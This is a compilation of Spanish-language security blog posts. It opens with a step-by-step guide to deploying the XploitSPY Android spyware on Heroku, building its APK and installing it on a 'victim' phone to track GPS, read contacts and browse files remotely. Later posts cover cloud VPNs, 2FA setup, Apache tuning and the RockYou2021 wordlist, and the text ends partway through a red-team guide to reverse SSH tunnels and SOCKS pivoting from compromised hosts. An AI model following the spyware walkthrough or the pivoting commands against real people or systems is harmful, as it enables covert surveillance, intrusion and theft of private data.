
Instalaremos git con el comando

pkg install git

Ahora instalaremos Node.js con el comando

pkg install nodejs

Por último instalaré la herramienta de Heroku que nos ayudará a desplegarlo en la plataforma con el comando

npm install -g heroku

Ahora descargaremos XploitSPY con el comando

git clone https://github.com/XploitWizer/XploitSPY.git

Una vez descargado ingresamos al directorio de XploitSPY

cd XploitSPY

Ahora que estamos en el directorio nos conectaremos a nuestra plataforma en la nube

heroku login -i

Nos pedirá que ingresemos las credenciales de acceso (email y password).

Si el proceso de ingreso sale bien veremos un mensaje confirmando nuestro ingreso

Ahora solo nos queda agregar los archivos de XploitSPY en nuestra plataforma con el comando

heroku git:remote -a nombre-de-la-app (nombre que le dimos a la aplicación al momento de crearla en Heroku)

Ahora agregamos lo necesario para que funcione bien XploitSPY, primero agregamos JVM

heroku buildpacks:add heroku/jvm

Agregamos Node.js

heroku buildpacks:add heroku/nodejs

Nota: en algunas ocasiones nos da un error como el siguiente:

Para solucionarlo solo instalamos buildpack-registry y buldpacks con los siguientes comandos

heroku plugins:install buildpack-registry

heroku plugins:install buildpacks

Por último hacemos un push para desplegar XploitSPY en la plataforma con el comando

git push heroku master

Esto puede tardar un poco, al finalizar veremos el mensaje de build succeeded

Una vez terminado esto, ya estamos listos para usar XploitSPY, nos dirigimos a nombre-de-la-app.herokuapp.com para ingresar a la herramienta

Damos en iniciar sesión donde ingresaremos las credenciales de acceso (User: admin, Password: password)

Una vez ingresemos tendremos el panel de la herramienta

Para generar el apk nos dirigiremos al menú APK Builder

En la parte inferior damos clic en Build

Esperamos a que termine, y luego damos clic en Download

Ahora que tenemos el archivo .apk lo único que hace falta es instalarlo en un dispositivo víctima (Esto dependerá del vector de ataque que prefiramos usar, así que en este artículo no tocaré este punto).

Una vez instalado en un dispositivo “víctima” podemos ingresar desde cualquier navegador y nos dirigimos a Devices

Daremos clic en el botón Manage del dispositivo que queramos controlar

Veremos información y las opciones que tenemos disponibles

Desde aquí ya podemos tener acceso a la información del dispositivo, como el posicionamiento GPS, los números de contacto, podemos incluso explorar los archivos del teléfono de forma remota

Autor: Rodrigo Castro Díaz

@TheHackingDay

CUATRO BENEFICIOS DE CLOUD VPN PARA SU EMPRESA

2022-04-13T07:57:00.000-05:00

La computación en la nube es una tecnología bien conocida ahora, y algunas empresas ya están utilizando más servicios basados en la nube que herramientas basadas en hardware. Como un empleado promedio usa una variedad de aplicaciones en la nube para ejecutar las operaciones diarias, la seguridad de la red basada en la nube se convierte en un tema vital para el éxito de una empresa. Es por eso que la mayoría de las empresas usan soluciones de VPN en la nube, y aquí hay cuatro beneficios de una VPN en la nube para su negocio.

Debe conocer la VPN en la nube y su funcionalidad antes de aprovechar sus beneficios. Veamos qué es una VPN en la nube y cómo funciona.

Cloud VPN es una solución de anonimato y seguridad cibernética que es fundamentalmente diferente de las VPN tradicionales basadas en hardware. En primer lugar, las soluciones VPN tradicionales requieren un equipo de seguridad de TI interno y una selección de hardware costoso. Las empresas con presupuestos significativos ejecutan su propia VPN en sus centros de datos para tener un sistema de ciberseguridad capaz.

El problema es que no todas las empresas pueden implementar hardware y mantener soluciones VPN, ya que no cuentan con un equipo de TI dedicado. Cloud VPN brinda un enfoque diferente a la seguridad cibernética al ofrecer una VPN basada en la nube que no depende del hardware ni necesita un equipo de TI para su mantenimiento. Se proporciona como un servicio, por lo que el proveedor se ocupa de su implementación y operación.

La funcionalidad, por otro lado, es similar y las soluciones VPN en la nube brindan el mismo nivel de seguridad que sus contrapartes basadas en hardware. Estos servicios cifran toda la comunicación en su red mediante la creación de un túnel privado, le permiten verificar a los usuarios en una red corporativa y lo protegen de las amenazas externas de Internet.

Hay una diferencia que le da ventaja a las VPN en la nube; la capacidad de proporcionar acceso global y seguro. Estas soluciones no dependen del hardware y son igualmente accesibles sin limitaciones geográficas. Cloud VPN es una forma más fácil y económica de brindar seguridad a su red.

Cuatro beneficios de las soluciones VPN en la nube

Es posible que se pregunte cuáles serán las ventajas si compra una VPN empresarial en la nube para su empresa. Veamos cuatro beneficios de las soluciones VPN en la nube para que sepa qué obtendrá por su dinero.

1- Proteger la red corporativa de ciberataques

Las soluciones de Cloud VPN crean una puerta de enlace privada desde un punto final a su red corporativa. También cifran toda la información compartida para garantizar la máxima seguridad de los datos. Al utilizar una solución de VPN en la nube, puede proporcionar un túnel seguro para que sus empleados compartan archivos, se comuniquen entre sí y envíen datos confidenciales de forma segura.

Cloud VPN protege a su empresa contra cualquier posible violación de datos. Pero incluso si un ciberdelincuente adquiere una parte de los datos de su red, estará completamente encriptada. Por lo tanto, sus datos corporativos no serán más que una tontería para los piratas informáticos, ya que no tienen la clave de cifrado. Estas soluciones aportan seguridad a su empresa antes y después de una posible filtración de datos.

2- Sistema de verificación de usuarios de última tecnología

La protección de los datos corporativos de las amenazas externas de Internet se puede realizar mediante el cifrado y una puerta de enlace privada. Sin embargo, si no puede verificar los usuarios que acceden a su red corporativa, el riesgo siempre existe.

Las soluciones de Cloud VPN le ofrecen la última tecnología en sistemas de verificación de usuarios que han demostrado ser efectivos. Ahora, puede verificar los usuarios autorizados antes de otorgar acceso a la red corporativa con métodos como 2FA, biometría o SSO.

3- Acceso directo a aplicaciones en la nube

Según el informe de Statista, las organizaciones utilizaron de 16 a 177 aplicaciones SaaS diferentes en 2020. Brindar un acceso conveniente pero seguro a estas aplicaciones en la nube es crucial para el éxito de una empresa.

Las soluciones VPN tradicionales basadas en hardware ya no son prácticas, ya que enrutan a los usuarios finales a un centro de datos antes de otorgarles acceso a las herramientas SaaS. Los servicios de Cloud VPN garantizan un acceso directo, rápido y seguro a estas aplicaciones basadas en la nube. Son más prácticos cuando se trata de acceso a la nube.

4- Conexión remota segura a la red corporativa

El modelo de trabajo remoto es el preferido por muchas empresas en todo el mundo. Si una empresa puede ejecutar operaciones de forma remota, este modelo es igualmente productivo y más asequible. Esto es, por supuesto, si la empresa puede proporcionar acceso remoto seguro.

A diferencia de las VPN de hardware, las soluciones de VPN en la nube no dependen de las redes locales y son accesibles globalmente. Incluso si tiene una fuerza laboral dispersa, puede evitar las filtraciones de datos con un simple servicio de VPN en la nube, independientemente de la ubicación geográfica de los miembros de su equipo.

Conclusión

Es posible que no tenga el presupuesto necesario para implementar una solución VPN basada en hardware y no está solo. Es por eso que muchas organizaciones de todo el mundo ya prefieren la VPN en la nube. Estos excelentes servicios ofrecen soluciones VPN escalables, asequibles y fáciles de implementar para que su red corporativa sea tan segura como cualquier otra.

Proteger la red corporativa es sinónimo de éxito y no necesita un proceso demasiado complicado para hacerlo. Enumeramos cuatro excelentes funciones de las que también puede beneficiarse instantáneamente al optar por una solución de VPN en la nube. Elija su proveedor y no permita que los piratas informáticos obtengan nada de su empresa.

Traducido de: Hackread.com

@jmvargas19

@TheHackingDay

IMPLEMENTACIÓN DEL DOBLE FACTOR DE AUTENTICACIÓN

2022-03-22T16:23:00.001-05:00

La protección de las cuentas de usuario que utilizamos en redes sociales y en diferentes servicios web es primordial, ya que si algún delincuente accede a estas podría obtener nuestra información confidencial, suplantar nuestra identidad, entre otro tipo de actos mal intencionados. Por eso siempre se recomienda el uso de contraseñas seguras y únicas para cada cuenta de usuario que se tenga, pero esto ya no es suficiente porque sigue existiendo el riesgo de que los delincuentes informáticos se ingenien la manera de obtener nuestra contraseña. Es acá donde entra el doble factor de autenticación (2FA).

El doble factor de autenticación es una configuración adicional que se utiliza para brindar mayor protección a la seguridad y privacidad de las cuentas de usuario ya que funciona utilizando dos conceptos, algo que se tiene y algo que se sabe.

Cuando hablamos de algo que se sabe estamos hablando de la contraseña y algo que se tiene es aquello que es único y solo lo posee el propietario de la cuenta (huella dactilar, retina, ADN, dispositivo, llave física, entre otras) que le permite ser identificado como tal.

Actualmente, muchas de las aplicaciones móviles, redes sociales, tiendas virtuales y otros servicios de internet soportan el doble factor de autenticación y permiten a sus usuarios elegir entre varias opciones de autenticación. Siendo la verificación por mensaje de texto el método más ampliamente utilizado, pero no es el único, ya que entre otros métodos podemos encontrar las aplicaciones de autenticación, las llaves de seguridad, la verificación por correo electrónico...

La activación del doble factor de autenticación varia según el servicio, en este articulo vamos a ver como activarlo en las principales redes sociales.

Facebook:

Vaya a la configuración de Facebook (Icono de tres líneas en la esquina superior derecha => Icono de engrane).
Ingrese en Centro de cuentas.
Busque la opción Contraseña y seguridad.
Pulse la opción Autenticación en dos pasos.
Seleccione la cuenta a configurara (Facebook).
Seleccione un método de autenticación (Para este artículo se seleccionó el método SMS o WhatsApp).
Elija el número de celular que tiene registrado en Facebook o registre un número nuevo, a este número le llegará un código de seis dígitos que debe ingresar para continuar con el proceso.
Una vez finalizado el proceso, Facebook le notificará que el proceso se realizó de manera exitosa.

Instagram

Vaya a la configuración de Instagram (Icono con la imagen de perfil en la esquina inferior derecha => Icono de tres líneas en la esquina superior derecha).
Ahora vaya a Centro de cuentas.
Seleccione Contraseña y seguridad.
Busque la opción Autenticación en dos pasos.
Seleccione la cuenta a configurara (Facebook).
Seleccione un método de autenticación (Para este artículo se seleccionó el método SMS o WhatsApp).
Seleccione o ingrese el número de teléfono al cual debe llegar el mensaje.
Ingrese el código de confirmación para continuar con el proceso.
Listo, ahora recibirá la confirmación de que el proceso se realizó de manera exitosa.

Vaya a configuración de X (Icono del perfil ubicado en la esquina superior izquierda).
En Configuración y soporte Seleccione Configuración y privacidad.
Busque Seguridad y acceso a la cuenta.
Seleccione la opción Seguridad.
Ahora vaya a Autenticación en dos fases.
Seleccione un método de autenticación.
Introduzca su contraseña de X.
Ingrese el número de teléfono que desee asociar con la cuenta.
Ingrese el código recibido para continuar el proceso.
Finalmente recibirá la notificación de que el proceso se realizó satisfactoriamente.

Tik Tok

En la sección del perfil vaya a configuración de Tik Tok (Icono de tres puntos ubicado en la esquina superior derecha).
Busque Seguridad.
Seleccione Verificación de 2 pasos.
Seleccione una de las opciones de autenticación.
Ingrese el número de teléfono en el cual va a recibir el código de verificación.
Ingrese el código de verificación recibido para continuar el proceso.
Una vez finalizado el proceso tendrá la confirmación de que el proceso se realizó exitosamente.

Google

Abra su cuenta de Google
Busque la opción Seguridad.
Vaya a Verificación en 2 pasos.
Ingrese su correo electrónico y contraseña.
Pulse Comenzar (Es posible que tenga que volver a ingresar la contraseña).
Seleccione la opción de autenticación que desee.
Ingrese el número de teléfono al que debe llegar el código de verificación.
Ingrese el código recibido.
Finalmente pulse la opción ACTIVAR para finalizar el proceso.

Telegram

Vaya a configuración de Telegram (Icono de tres líneas ubicado en la esquina superior izquierda).
Ingrese a Ajustes.
Busque Privacidad y seguridad.
Seleccione Verificación en dos pasos.
Seleccione Crear contraseña.
Introduzca una contraseña segura.
Vuelva a introducir la contraseña.
Si lo desea ingrese un indicio que le ayude a recordar la contraseña.
Si lo desea ingrese una dirección de correo de recuperación de la cuenta.
Al finalizar el proceso recibirá una notificación de que el proceso se realizó correctamente.

WhatsApp

Vaya a configuración de WhatsApp (Icono de tres puntos ubicado en la esquina superior derecha).
Seleccione la opción Ajustes.
Ingrese a Cuenta.
Busque Verificación en dos pasos.
Pulse el botón Activar.
Introduzca un código de seis dígitos.
Repita el código ingresado.
Si lo desea ingrese una dirección de correo para recuperación de la cuenta.
Finalmente, le saldrá un mensaje de que la verificación en dos pasos fue activada.

Esperamos que estos tips los ayuden a mejorar la seguridad de sus redes sociales y recuerden combinar el doble factor de autenticación con otras medidas de seguridad para mayor protección.

@jmvargas19

@TheHackingDay

OPTIMIZACIÓN DE SERVIDORES WEB

2021-06-25T07:35:00.001-05:00

Para mejorar el rendimiento de los servidores web se deben realizar algunos cambios en la configuración que estos tienen por defecto, en esta entrada vamos a explicar algunas de las modificaciones recomendadas en un servidor Apache para mejorar su rendimiento.

Para realizar el laboratorio que se explica en este articulo se utilizó un servidor CentOS 8, el cual cuenta con Apache, con el MPM Event y con PHP-FPM.

El primer paso para iniciar la optimización del servidor web es determinar el consumo de memoria RAM por parte de los procesos de Apache y php-fpm, para ello se descargó el script ps_mem.py de su repositorio oficial en Github.

wget https://raw.githubusercontent.com/pixelb/ps_mem/master/ps_mem.py

Posteriormente se ejecutó el script con el comando sudo python3 ps_mem.py

Para poder ejecutar este script se debe tener instalado el paquete Python3, si no se tiene este paquete instalado, se puede instalar con el comando sudo dnf install python3

De los procesos listados nos interesa la cantidad de procesos y el tamaño total de memoria RAM usados por httpd (5 : 54 MB) y php-fpm (2 : 53,6 MB).

Con estos datos y teniendo en cuenta que la máquina en la cual se realiza este laboratorio cuenta con 4 GB de memoria RAM y un procesador de 8 núcleos, se calculan los siguientes valores necesarios para la optimización.

Tamaño promedio por proceso httpd: 54/5 = 10,8.

Tamaño promedio por proceso php-fpm: 53,6 / 2 = 26,8.

Memoria reservada para el web server: (Se recomienda separar el 80% de la memoria RAM del equipo para los procesos del web server) 4000 * 80% = 3200

MaxRequestWorkers: Este valor se obtiene a partir de la siguiente formula:

MaxRequestWorkers = Memoria reservada para el web server / Tamaño promedio por proceso httpd

MaxRequestWorkers = 3200/10,8 = 296

Maxclients: Este valor se obtiene a partir de la siguiente formula

Maxclients = Memoria reservada para el web server / Tamaño promedio por proceso php-fpm

Maxclients = 3200/26,8 = 119

ServerLimit: El mismo valor asignado a MaxRequestWorkers (296)

StartServers: Es igual al número de núcleos del procesador (8)

pm.max_children: El mismo valor asignado a MaxClients (119)

pm.start_servers: Es igual al número de núcleos del procesador multiplicado por cuatro (32)

pm.min_spare_servers: Es igual al número de núcleos del procesador multiplicado por dos (16)

pm.max_spare_servers: El mismo valor asignado a pm.start_servers (32)

Luego de realizar los cálculos necesarios se procede a modificar los archivos de configuración de Apache y de PHP-FPM.

El archivo de configuración de Apache se encuentra generalmente en la ruta /etc/httpd/conf/httpd.conf y en este se añadieron las siguientes líneas:

El archivo de configuración de PHP-FPM generalmente se encuentra en la ruta /etc/php-fpm.d/www.conf y en este se realizaron las siguientes modificaciones:

pm = ondemand

pm.max_children = 29

pm.start_servers = 32

pm.min_spare_servers = 16

pm.max_spare_servers = 32

pm.max_requests = 1000

Una vez realizadas las modificaciones en los archivos de configuración, se reinician los servicios de Apache y php-fpm.

sudo service httpd restart

sudo service php-fpm restart

Finalmente se realiza una prueba de funcionamiento del web server, enviándole 5000 solicitudes con una concurrencia de 100 solicitudes al tiempo sin que se hayan presentado fallas ni en el envío de las solicitudes ni en el funcionamiento del web server.

ab -n 5000 -c 100

Esperamos que estas modificaciones les sean útiles en sus proyectos, sigan pendientes de nuestro blog que próximamente tendremos nuevas entradas relacionadas con este tema.

Fuente: medium.com

@jmvargas19

@TheHackingDay

ROCKYOU2021: EL COMPENDIO MÁS GRANDE DE CONTRASEÑAS HASTA AHORA

2021-06-18T18:53:00.000-05:00

Hace algunos días se conoció sobre la existencia de un nuevo y gigante compendio de contraseñas publicado en RaidForum por kys234 quien lo llamó Rockyou2021.

En esta entrada hablaremos un poco de que trata este diccionario y de las alertas que ha generado.

En el mes de abril un usuario de RaidForum identificado como kys234 publicó un diccionario de posibles contraseñas el cual llamó Rockyou2021. Desde que se conoció la existencia de este diccionario han salido diferentes publicaciones en internet, en las cuales se alerta sobre el peligro que este "nuevo" diccionario representa para los usuarios de la red. Es por esto que nos hemos interesado en investigar un poco más a fondo de que trata Rockyou2021.

Resulta que en realidad Rockyou2021 es un compendio de varios diccionarios de contraseñas y listas de palabras que podrían ser usadas como contraseñas. Entre las fuentes en las que se basa este diccionario están:

El diccionario CrackStation
La lista de palabras de Wikipedia que se encuentra en Hack3r.com
La base de datos de posibles contraseñas de Daniel Meissler en SecLists
La lista de palabras probables publicada por berzerk0
La base de datos de listas de palabras de weakpass.com
Los más de 3.200 millones de registros contenidos en COMB (Compilation of many breaches)

Así que si bien Rockyou2021 es un gran compendio con 8.200 millones de registros, esto no representa un nuevo peligro para los usuarios de internet, ya que, como se ha explicado en este articulo, esos registros ya existían en otros sitios. Por otro lado, la gran mayoría de los registros que tiene Rockyou2021 son palabras que podrían usarse como contraseñas, más no se tratan de contraseñas que hayan sido expuestas. Por lo tanto, aunque se podría pensar que este diccionario facilitaría las cosas para crackear contraseñas, también podría tener un efecto inverso dado que pesa más de 92 GB.

Ahora que ya sabemos de que trata Rockyou2021, podemos decir que si bien es muy recomendable cambiar las contraseñas periódicamente, implementar el doble factor de autenticación, revisar que no se haya sido victima de un filtrado de contraseñas en sitio como Have I Been Pwned, y otras tantas recomendaciones; Rockyou2021 por si solo no es un motivo primordial para hacerlo.

Fuente: Chris Partridge Tech

@jmvargas19

@TheHackingDay

GUÍA DE SEGURIDAD OFENSIVA PARA TÚNELES SSH Y PROXIES

2021-06-16T14:40:00.001-05:00

Esta publicación pretende ser una ventanilla única para todas las cosas que un analista de seguridad ofensiva desearía saber sobre el uso de túneles Secure Shell (SSH) y proxies SOCKS. La información proporcionada aquí no es nueva, pero pretende ser un documento de referencia que se pueda utilizar durante las operaciones.

Traducido de: SPECTEROPS

Conceptos básicos de Secure Shell (SSH)

SSH es un protocolo que permite a un usuario conectarse de forma remota a un host y, por lo general, proporciona un shell interactivo o símbolo del sistema que se puede aprovechar para ejecutar comandos. La mayoría de los servidores basados en Linux tienen un servidor SSH instalado y tanto Windows como Linux tienen un cliente SSH incorporado. El cliente / servidor SSH más común es la implementación de OpenSSH y es la aplicación utilizada para todas las referencias en esta publicación.

Cortafuegos

Debido a que SSH facilita el control remoto de un host, el servidor SSH siempre debe configurarse con reglas de firewall que incluyan la conexión de un host específico en la lista blanca. Esto es especialmente cierto si se puede acceder desde Internet al servidor SSH. Sería un fracaso significativo si la infraestructura de operaciones ofensivas se comprometiera o incluso fuera accesible para los adversarios.

Autenticación

Las conexiones SSH se pueden establecer con solo un nombre de usuario y contraseña para la autenticación. Además, SSH permite a los usuarios crear un par de claves pública y privada que posteriormente se pueden utilizar en lugar de una contraseña. Estas claves ofrecen un cifrado asimétrico configurable fuerte. Los usuarios deben asegurar el acceso a su clave privada generada como si fuera un secreto. La clave pública generada se agrega al archivo de claves autorizadas SSH del host de destino.

Al igual que una contraseña, si un atacante recupera una clave privada, puede utilizarse para acceder al servidor. Debido a esto, las claves SSH deben estar encriptadas con una contraseña que actúa como un segundo factor. La utilidad ssh-keygen se puede utilizar para crear un par de claves RSA de 4096 bits con la sentencia:

ssh-keygen -t rsa -b 4096

De forma predeterminada, esto generará una clave privada denominada id_rsa y un archivo de clave pública denominado id_rsa.pub. Asegúrese de ingresar una contraseña cuando se le solicite que cifre la clave. Los permisos del archivo de clave privada deben restringirse para que solo el usuario, y nadie más, pueda leer el archivo. Si los permisos del archivo permiten que otros usuarios lo lean, el cliente SSH ignorará el archivo de identidad y mostrará un error. En un host Linux, los permisos deben ser "600" para que el usuario pueda leer y escribir el archivo, pero no se permite el acceso al grupo ni a otros usuarios.

Cada sección principal de esta publicación se basará en la sección anterior y también dividirá los comandos en partes numeradas en un intento de aumentar la comprensión. Se presentará una imagen visual después de cada conjunto de comandos para ilustrar la conectividad de la red y para identificar en qué hosts se deben ejecutar los comandos. Para empezar, LINUX1 representa la estación de trabajo Linux de un analista y REDIR1 representa un host accesible a Internet que forma parte de la infraestructura de la operación ofensiva.

La siguiente imagen ilustra el uso de una clave privada SSH para conectarse a un servidor SSH en el host REDIR1 como el usuario rastley del LINUX1:

Utilice el cliente SSH en LINUX1
Utilice el archivo de identidad, la clave privada del usuario en /root/priv.key
Establezca una conexión SSH a REDIR1 e inicie sesión como rastley

Esta imagen ilustra el establecimiento de una conexión SSH de LINUX1 a REDIR1

Túnel de reenvío de puerto remoto

OBJETIVO: Conectarse a un puerto en un host comprometido en la red del cliente desde un redirector.

Supongamos que durante una evaluación, un analista compromete un host, llamado PWNED1, que está ejecutando un servidor SSH. El analista ahora quiere conectarse vía SSH en el host comprometido directamente desde Internet. Una opción es crear un túnel SSH directo de puerto remoto, también conocido como túnel inverso, desde PWNED1 hasta el servidor del analista accesible a Internet, REDIR1. Una vez que el túnel está configurado, el analista obtiene conexión SSH directamente en el host comprometido desde el redirector.

Desde el host comprometido, use la bandera -R para construir un túnel SSH de reenvío de puerto remoto. Esta bandera toma un argumento de [bind_address:]port:host:hostport. El bind_address es la interfaz de la dirección IP de ese túnel, debe unirse a, o escuchar sobre, por el host remoto. El bind_address no se debe confundir con la dirección del servidor SSH que conecta el cliente SSH para la autentificación. El valor predeterminado de OpenSSH es utilizar la dirección IP del adaptador de bucle invertido del host, 127.0.0.1. Si desea utilizar una IP de interfaz diferente, la opción GatewayPorts debe estar habilitada en el archivo /etc/ssh/sshd_config del servidor SSH. Cuando esta opción está habilitada y bind_address está vacío (0.0.0.0 o *), entonces se vinculará a TODAS las interfaces. Esto presenta un problema porque ahora cualquier persona en Internet podría conectarse al túnel porque estaría escuchando en una interfaz con una dirección IP pública y, posteriormente, llegaría al host interno comprometido. Si las opciones de GatewayPorts NO están habilitadas y bind_address está en blanco, el túnel solo se vinculará al adaptador de bucle invertido. Por esta razón, se recomienda que los analistas siempre especifiquen explícitamente bind_address en lugar de asumir la configuración del servidor SSH.

El nombre "localhost" normalmente se refiere al adaptador de bucle invertido del host; sin embargo, también podría hacer referencia a cualquier dirección IP arbitraria modificando el archivo /etc/hosts. Por esta razón, se recomienda que los analistas siempre usen explícitamente la dirección IP de la interfaz 127.0.0.1, en lugar de un nombre DNS que se supone que se resuelve en el adaptador de bucle invertido.

El argumento port especifica el puerto por el cual el túnel se conectará a la bind_address en la interfaz del servidor remoto. Este puerto debe estar libre y la cuenta de usuario debe tener los permisos adecuados para conectarse a un puerto privilegiado, cualquiera que sea menor que 1024.

El argumento host es la interfaz a la que se enlazará el túnel en el host de origen donde se ejecuta el comando y desde donde se inicia la conexión. Se aplican las mismas reglas que antes, lo mejor es especificar explícitamente el adaptador de bucle invertido con 127.0.0.1.

El último argumento, hostport, es el puerto en el host de origen al que el túnel enviará tráfico. El puerto de host debe hacer referencia a un servicio en el host de origen al que un analista desea conectarse a través del túnel. Debido a que queremos llegar al servidor SSH en el host de origen, se debe usar el puerto 22.

Este comando construirá un túnel de reenvío de puertos SSH que envía tráfico desde el host remoto al host de origen. La bandera -R del cliente SSH determina la dirección en la que fluye el tráfico a través del túnel en relación con el lugar donde se ejecutó el comando. El comando se ejecutará en el host de origen, PWNED1, por lo que el tráfico fluirá desde el host remoto REDIR1 al host de origen PWNED1.

Utilice el cliente SSH en PWNED1
Cree un túnel de reenvío de puertos desde el host remoto, REDIR1, al host de origen, PWNED1
En el host remoto, REDIR1, escuche en bind_address, 127.0.0.1, en el puerto 2222
Reenvíe la conexión desde el host remoto, REDIR1, al servicio SSH que ya se está escuchando en el host de origen, PWNED1, adaptador host loopback 127.0.0.1 en hostport 22
El cliente SSH debe conectarse a REDIR1 e iniciar sesión como rastley

Una vez que se ha establecido un túnel SSH entre el host comprometido y el host de Internet, un analista ahora puede usarlo para conectarse al servidor SSH en el host de origen, PWNED1. Desde REDIR1, para enlazar el puerto 2222, el tráfico se enviará a través del túnel al hostport en el servidor host. El analista debe proporcionar un nombre de usuario y una contraseña válidos para el host comprometido, PWNED1.

Utilice el cliente SSH en REDIR1
Establezca una conexión SSH al puerto 2222
El cliente SSH debe conectarse al adaptador loopback (127.0.0.1), que se reenvía a través del túnel SSH creado previamente a PWNED1, e iniciar sesión como el usuario hpotter, una cuenta de usuario válida en PWNED1.

Esta imagen visualiza el establecimiento de un túnel SSH de reenvío de puerto remoto entre REDIR1 y PWNED1, y luego el inicio de una nueva sesión SSH a través del túnel de REDIR1 a PWNED1.

Aplicaciones web

OBJETIVO: conectarse a una aplicación web en el host comprometido en la red del cliente desde un redirector.

Los túneles de reenvío de puertos remotos se pueden usar para conectarse a cualquier servicio que escuche en el host de origen. Un ejemplo podría ser conectarse a una escucha de aplicaciones web en PWNED1 por el puerto 8443. Esto podría ser algo así como un escáner de vulnerabilidad o controlador de la máquina virtual. Este comando crea un túnel de reenvío de puertos para acceder a una aplicación web que escucha en PWNED1.

Utilice el cliente SSH en PWNED1
Cree un túnel de reenvío de puertos desde el host remoto, REDIR1, al host de origen, PWNED1
En el host remoto, REDIR1, escuche en bind_address, 127.0.0.1, en el puerto 443
Reenvíe la conexión desde el host remoto al servidor web que ya está a la escucha de la fuente, PWNED1, adaptador host loopback 127.0.0.1 hostport 8443
El cliente SSH debe conectarse a REDIR1 e iniciar sesión como rastley

Para usar el túnel, abra un navegador web en REDIR1 y navegue hasta https://127.0.0.1:443. El tráfico se reenviará a través del túnel a la aplicación web que escucha en PWNED1 en el puerto 8443.

Argumentos opcionales del cliente SSH

Hay algunos argumentos opcionales del cliente SSH que son útiles al crear túneles. Cuando el comando de túnel de reenvío de puerto remoto de la sección anterior se ejecutó en PWNED1, dejó un indicador de terminal SSH interactivo en REDIR1. Cualquiera con acceso a PWNED1 ahora podría emitir comandos a REDIR1, dependiendo del contexto de ejecución del comando. La bandera -N elimina la capacidad de ejecutar comandos en el host remoto. Cuando la bandera -N se usa, se establece una conexión SSH pero el analista no tendrá un mensaje para ingresar o ejecutar comandos. La bandera -T evita que se asigne una pseudo-terminal para la conexión; sin embargo, los comandos aún podrían emitirse si solo se usara la bandera -T. La mejor forma de evitar la ejecución remota de comandos es utilizar juntas las banderas -N y -T.

En la mayoría de los casos, un analista no necesita interactuar con un túnel una vez que está configurado. Para evitar que el túnel bloquee el uso continuo de la terminal actual, use la bandera -f. Esta bandera bifurca el proceso del cliente SSH en segundo plano justo después de la autenticación.

Utilice el cliente SSH en PWNED1
Utilice los siguientes argumentos SSH

f => Bifurque este proceso de cliente SSH en segundo plano después de la autenticación
N => Sin ejecución de comandos en el host remoto
T => No asigne una pseudo-Terminal en el host remoto
R => Cree un túnel de reenvío de puerto remoto desde el host remoto al host de origen

En el host remoto, REDIR1, escuche en bind_address, 127.0.0.1, en el puerto 443
Reenvíe la conexión desde el host remoto al servidor web que ya está a la escucha de la fuente, PWNED1, adaptador host loopback 127.0.0.1, hostport 8443
El cliente SSH debe conectarse a REDIR1 e iniciar sesión como rastley

Proxy de SOCKS

OBJETIVO: Herramientas y tráfico proxy desde un host Linux a la red del cliente.

Acceder a un solo servicio que escucha en un objetivo comprometido es bueno, pero sería mejor si los operadores pudieran llegar a cualquier host en toda la red interna del cliente. SSH convenientemente tiene incorporado un modo de actuar como un servidor SOCKS a través de su función “Dynamic” de reenvío de puerto a nivel de aplicación. SOCKS versión 5 es un protocolo que actúa como una puerta de enlace y transmite de forma transparente el tráfico de red hacia y desde su puerto de escucha. Esto se usa comúnmente para eludir las restricciones de la red. El tráfico parece provenir del host donde está escuchando el servidor SOCKS y no muestra la dirección IP del host que inició la solicitud. Para crear un servidor proxy SOCKS de escucha, use el argumento del puerto SSH -D [bind_address:].

Utilice el cliente SSH en PWNED1
Crea un puerto Dynamic, un servidor SOCKS
El servidor SOCKS escuchará en el bind_address 127.0.0.1 puerto 9052
El cliente SSH debe conectarse a sí mismo (PWNED1) , a través del adaptador loopback, e iniciar sesión como hpotter

Una vez que el servidor SOCKS está escuchando, debe ser accesible por un analista para que sus herramientas puedan usarse para llegar a las redes de destino internas. Cree un túnel de reenvío de puerto remoto SSH para que el servidor SOCKS en PWNED1 esté disponible a través de REDIR1.

Utilice el cliente SSH en PWNED1
Cree un túnel de reenvío de puertos desde el host remoto, REDIR1, al host de origen, PWNED1
En el host remoto, REDIR1, escuche en bind_address, 127.0.0.1, en el puerto 9051
Reenvíe la conexión desde el host remoto al servicio SOCKS que ya se está escuchando en la fuente, PWNED1, adaptador host loopback 127.0.0.1 hostport 9052
El cliente SSH debe conectarse a REDIR1 e iniciar sesión como rastley

Un programa, aplicación o herramienta de seguridad ofensiva debe tener soporte explícito para que un proxy lo utilice de forma nativa. Algunas herramientas como Firefox y Burp Suite tienen una opción para configurar un proxy. Sin embargo, hay muchas herramientas que no tienen soporte de proxy explícito.

Proxychains-ng es una herramienta que se puede utilizar para enviar tráfico TCP desde cualquier programa arbitrario a un proxy SOCKS. No es compatible con ICMP o UDP. Una vez que se haya instalado proxychains, edite el archivo /etc/proxychains4.conf para que la última línea del archivo de configuración apunte a la interfaz y al puerto donde está escuchando el servidor SOCKS. En nuestro ejemplo, la última línea sería el siguiente:

socks4 127.0.0.1 9051.

Con las cadenas de proxy configuradas, un analista podría ejecutar un programa arbitrario y enviar su tráfico TCP a la red interna del cliente. Si un analista quisiera usar Nmap y hacer un escaneo de puerto TCP para el puerto 445, prefijaría su comando normal con "proxychains". Específicamente para Nmap, la configuración proxy_dns de proxychains debe estar deshabilitada. Debido a que proxychains no admite UDP o ICMP, se deben utilizar los tipos de exploración Nmap TCP SYN y connect. Un comando de ejemplo de Nmap que usa cadenas de proxy se ve así:

proxychains nmap -sT -p 445 192.168.1.10

Reenvío dinámico inverso de puerto

OBJETIVO: Herramientas y tráfico proxy desde un host Linux a la red del cliente en un solo comando ssh.

OpenSSH versión 7.6 introdujo una nueva característica denominada "reenvío dinámico inverso" que aprovecha la sintaxis extendida para el argumento -R. Esta función permite a un operador crear un servicio de escucha SOCKS5 en un host remoto con un solo comando. El ejemplo anterior en la sección Reenvío de puerto remoto requería dos comandos SSH; uno con el argumento -D para crear el servicio SOCKS5 y un segundo comando con el argumento -R para conectarlo con un túnel. Esta función está habilitada en el lado del cliente y, por lo tanto, no es necesario configurarla en el servidor. La documentación de SSH dice:

Si no se especificó un destino explícito, ssh actuará como un proxy SOCKS 4/5 y reenviará las conexiones a los destinos solicitados por el cliente SOCKS remoto.

La sintaxis de extensión para el argumento SSH -R es [bind_address:] port.

Utilice el cliente SSH en PWNED1
Cree un túnel de reenvío de puertos dinámico desde el host remoto, REDIR1, al host de origen, PWNED1
En el host remoto, REDIR1, cree un servicio SOCKS que esté escuchando en bind_address, 127.0.0.1, en el puerto 9051
El cliente SSH debe conectarse a REDIR1 e iniciar sesión como rastley

DNS

